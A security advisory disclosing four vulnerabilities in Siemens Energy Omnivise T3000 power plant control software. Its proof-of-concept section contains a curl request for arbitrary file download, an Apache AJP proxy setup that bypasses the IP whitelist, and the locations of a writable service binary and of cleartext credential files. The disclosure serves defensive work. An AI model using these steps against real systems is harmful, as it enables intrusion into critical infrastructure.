Siemens Energy Omnivise T3000 8.2 SP3 Privilege Escalation / File Download Vulnerabilities

=======================================================================
              title: Multiple vulnerabilities
            product: Siemens Energy Omnivise T3000
 vulnerable version: >=8.2 SP3
      fixed version: see solution section
         CVE number: CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879
             impact: High
           homepage: https://www.siemens-energy.com/global/en/home/products-services/product/omnivise-t3000.html
              found: 2024-06-02
                 by: Steffen Robertz (Office Vienna)
                     Andreas Kolbeck (Office Munich)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Eviden business
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Located in 90 countries, Siemens Energy operates across the whole energy landscape.
From conventional to renewable power, from grid technology to storage to electrifying
complex industrial processes.

Our mission is to support companies and countries with what they need to reduce
greenhouse gas emissions and make energy reliable, affordable, and more sustainable.
Let’s energize society."

Source: https://www.siemens-energy.com/global/en/home/company/about.html


Business recommendation:
------------------------
Siemens has released their security advisory SSA-857368, see the following URL
for further details:
https://cert-portal.siemens.com/productcert/html/ssa-857368.html#mitigations-section

Follow the mitigation instructions communicated in Omnivise T3000 Technical News 2024-089
and SE Controls Security Announcement 2024-01.

SEC Consult highly recommends to perform a thorough security review of the product
conducted by security professionals to identify and resolve potential further
security issues.


Vulnerability overview/description:
-----------------------------------
1) Local Privilege Escalation via Writable Service Binary (CVE-2024-38876)
Insecurely configured services or the insecure configuration of their authorizations
lead to privilege escalation vulnerabilities in the Windows operating system. It is
possible for a low-privileged user to modify a service in such a way that it executes
arbitrary code instead of starting the actual service. The service path is writable by
the "Authenticated Users" group.
Precondition for exploitation: requires authenticated local access to the Terminal Server
of the T3000 system.

2) Cleartext Storage of Passwords in Config and Log Files (CVE-2024-38877)
Multiple files containing cleartext passwords were discovered. These can be used
to jump from host to host and thus compromise the whole security architecture of
the T3000 system.
Precondition for exploitation: requires administrative local access to any server of the
T3000 system.

3) File System Access via RemoteDiagnosticView Website (CVE-2024-38878)
The RemoteDiagnosticView application is a web application hosted on the application
server. One parameter accepts a full path, which can be abused to download arbitrary
files.
Precondition for exploitation: requires administrative remote access to the Application
server of the T3000 system.

4) IP Whitelist Bypass (CVE-2024-38879)
The application server is hosting the T3000 web application on port 8080. However,
only the Terminal Server is whitelisted. This whitelisting can be circumvented by
exploiting the additionally exposed Tomcat AJP service on port 8009.
Precondition for exploitation: requires unauthenticated remote access to the Application
server of the T3000 system


Proof of concept:
-----------------
1) Local Privilege Escalation via Writable Service Binary (CVE-2024-38876)
The following path hosts a file that is used by the "DSGW Service" of the T3000 system:

"E:\dsgw\gw\bin\dsgwservice.exe"

The path is writable by the "Authenticated Users" group.


2) Cleartext Storage of Passwords in Config and Log Files (CVE-2024-38877)
Multiple files containing cleartext passwords were discovered.

Terminal Server:
* C:\Program Files\SPPA-T3000\snmpv3trap\Config.properties (only readable by Admin)
* E:\DSGW\GW\config_PDC.properties (Passwords are Base64 encoded)
* C:\Program Files\SPPA-T3000\Logs\AppInstallLogs\PostInstallConfigList.xml (Readable by every user)


Application Server:
* D:\SPPA-T3000\_framework\_jre\installvariables.properties (contains passwords of tomcat and MySQL service
* D:\SPPA-T3000\Orion\install\_uninstall\installvariables.properties (contains password for MySQL service and installation)

All Servers:
All servers are being deployed via Puppet. However, the cache file is never
cleared and contains the initial passwords of all systems of the T3000 system:

"C:\Program Data\PuppetLabs\puppet\cache\client_data\catalog\<uid.json>"

---------------------------------------
[...]
"parameters": {
"foreman_pass": "[redacted]",
"foreman_url": "[redacted]",
"foreman_user": "puppet_provider",
"is_sec": "true",
"mpssvc_pass": "[redacted]"
}
[...]
"parameters": {
"crsphost": "XXX.XXX.XXX.XXX",
"crsppswd": "",
"crsprepo": "AVPatterns",
"crspservice": "SFTP",
"crspuser": "siem_t3000_west",
"primary_ts": true
}
[...]
"parameters": {
[...]
"snmpv3_authpass": "[redacted]",
"snmpv3_privpass": "[redacted]",
"snmpv3_user": "snmpuser",
"snmpv3_hash": "SHA",
"snmpv3_encrypt": "AES"
}
[...]
"parameters": {
[...]
"cyg_server_passwd": "[redacted]",
[...]
"fst_appsrv_passwd": "",
"fst_appsrv_red_hgw_ip": "XXX.XXX.XXX.XXX",
[...]
"icmauser_passwd": "[redacted]",
[...]
"opcadmin_passwd": "[redacted]",
"operator01_passwd": "[redacted]",
"operator02_passwd": "[redacted]",
"operator03_passwd": "[redacted]",
"operator04_passwd": "[redacted]",
"operator05_passwd": "[redacted]",
"operator06_passwd": "[redacted]",
"operator07_passwd": "[redacted]",
"operator08_passwd": "[redacted]",
"operator09_passwd": "[redacted]",
"operator10_passwd": "[redacted]",
"operators_password": "[redacted]",
"pdm01_passwd": "[redacted]",
"pdm02_passwd": "[redacted]",
"pdm03_passwd": "[redacted]",
"pdm04_passwd": "[redacted]",
"pdm05_passwd": "[redacted]",
"pdm06_passwd": "[redacted]",
"pdm07_passwd": "[redacted]",
"pdm08_passwd": "[redacted]",
"pdm09_passwd": "[redacted]",
"pdm10_passwd": "[redacted]",
"pmas_passwd": "[redacted]",
"pmsvc_passwd": "[redacted]",
"pmts_passwd": "[redacted]",
"reparchive_passwd": "[redacted]",
[...]
"t3kservice_passwd": "[redacted]",
"[...]
"tomcatadmin_passwd": "[redacted]",
"tsuser01_passwd": "[redacted]",
"tsuser02_passwd": "[redacted]",
"tsuser03_passwd": "[redacted]",
"tsuser04_passwd": "[redacted]",
"tsuser05_passwd": "[redacted]",
"tsuser06_passwd": "[redacted]",
"tsuser07_passwd": "[redacted]",
"tsuser08_passwd": "[redacted]",
"tsuser09_passwd": "[redacted]",
"tsuser10_passwd": "[redacted]",
"txpdomain_passwd": "[redacted]",
[...]
"vm_r8_passwd": "[redacted]",
[...]
"vm_tc_passwd": "[redacted]",
[...]
"vm_ts_passwd": "[redacted]",
[...]
"vm_whitelist_hostname": "",
"vm_whitelist_passwd": "",
"wbuser01_passwd": "[redacted]",
"wbuser02_passwd": "[redacted]",
"wbuser03_passwd": "[redacted]",
"wbuser04_passwd": "[redacted]",
"wbuser05_passwd": "[redacted]",
"wbuser06_passwd": "[redacted]",
"wbuser07_passwd": "[redacted]",
"wbuser08_passwd": "[redacted]",
"wbuser09_passwd": "[redacted]",
"wbuser10_passwd": "[redacted]",
"wra01_passwd": "[redacted]",
[...]
"dsrm_passwd": "[redacted]",
[...]
"dc_passwd": "[redacted]",
[...]
"patchsvc_passwd": "[redacted]",
}
--------------------------------------------------

To understand the impact of this file, we have to explain a little about the T3000 system.
The system is split into three levels: Operator, Automation and Process.

Operator Level: This is the level, where thin clients are situated. In our testcase,
this level consisted of the Terminal Server that engineers could connect to. From here,
they start the T3000 application, which simply loads a browser and displays a Java
application served from the Application Server.

Automation Level: This level consists of application and automation servers. The application
server hosts the not time critical components of power generations such as the web server.
The automation servers are taking care of time critical operations. In our testcase these
were PLCs from the SIMATIC S7-CPU family.

Process Level: This level consists of the I/O modules that are controlled by the automation
servers.

The Terminal Server, located on the operator level already contained the Puppet cache file,
which contained all the local Windows users used in the T3000 system in clear text. As the
Terminal Server communicates with the Application Server, they have to be connected via network.
Thus, the attacker can use the credentials on the Terminal Server to jump to the Application
Server. This server is in the same segment as the physical PLC CPUs. Thus an attacker can now
also control the PLCs and thus the whole power plant.

In order to read the Puppet cache file, an attacker has to gain local admin rights first.
For this, vulnerability 1 can be used.


3) File System Access via RemoteDiagnosticView Website (CVE-2024-38878)
The RemoteDiagnosticView website is hosted at the following URL:

http:// <IP Application Server>:8080/RemoteDiagnosticView

In our testcase it was configured using default credentials with the following username and
an easy to guess password:

txpadmin:[redacted]

Using these credentials an attacker gains an authenticated session. From there, one can
simply download arbitrary files:

------------------------
Curl -H "Cookie: JSESSIONID=31B4F2F1BAFC473AB41B65DDF2FD10BA;" -I -H "Content-Type:
application/x-www-form-urlencoded" -X POST -d "filename=D:\sectest.txt&type=TEXT"
http://$host:8080/RemoteDiagnosticView/DataServlet


HTTP/1.1 200
Content-Type: text/plain
Transfer-Encoding: chunked
[...]

Sectest
---------------------------------


4) IP Whitelist Bypass (CVE-2024-38879)
The AJP protocol can be used to proxy requests from an Apache server to an application
running on Tomcat. By setting up a local Apache server and configuring it to use the
AJP service of the Application Server, the IP filter is circumvented.
The following setup was built:

------------------------------
sudo apt-get install libapache2-mod-jk
sudo vim /etc/apache2/apache2.conf
# append the following line to the config
   Include ajp.conf
sudo vim /etc/apache2/ajp.conf
# create the following file
    ProxyRequests Off
    <Proxy *>
       Order deny,allow
       Deny from all
       Allow from localhost
    </Proxy>
    ProxyPass   / ajp://<Application Server IP>:8009/
   ProxyPassReverse   / ajp://<Application Server IP>:8009/
sudo a2enmod proxy_http
sudo a2enmod proxy_ajp
sudo systemctl restart apache2
--------------------------
Afterwards, the e.g. RemoteDiagnosticView can be loaded from http://127.0.0.1/RemoteDiagnosticView


Vulnerable / tested versions:
-----------------------------
The following version has been tested which was the latest version available
at the time of the test:
* 8.2

According to the vendor (T3000 SE Controls Security Announcement 2024/01 Update 1),
the following versions and components are affected:

All T3000 Versions >= Release 8.2 SP3:
* Security Server
* Thin Clients
* Terminal Server
* Application Server
* Domain Controller
* PDM VM
* Whitelisting VM
* NIDS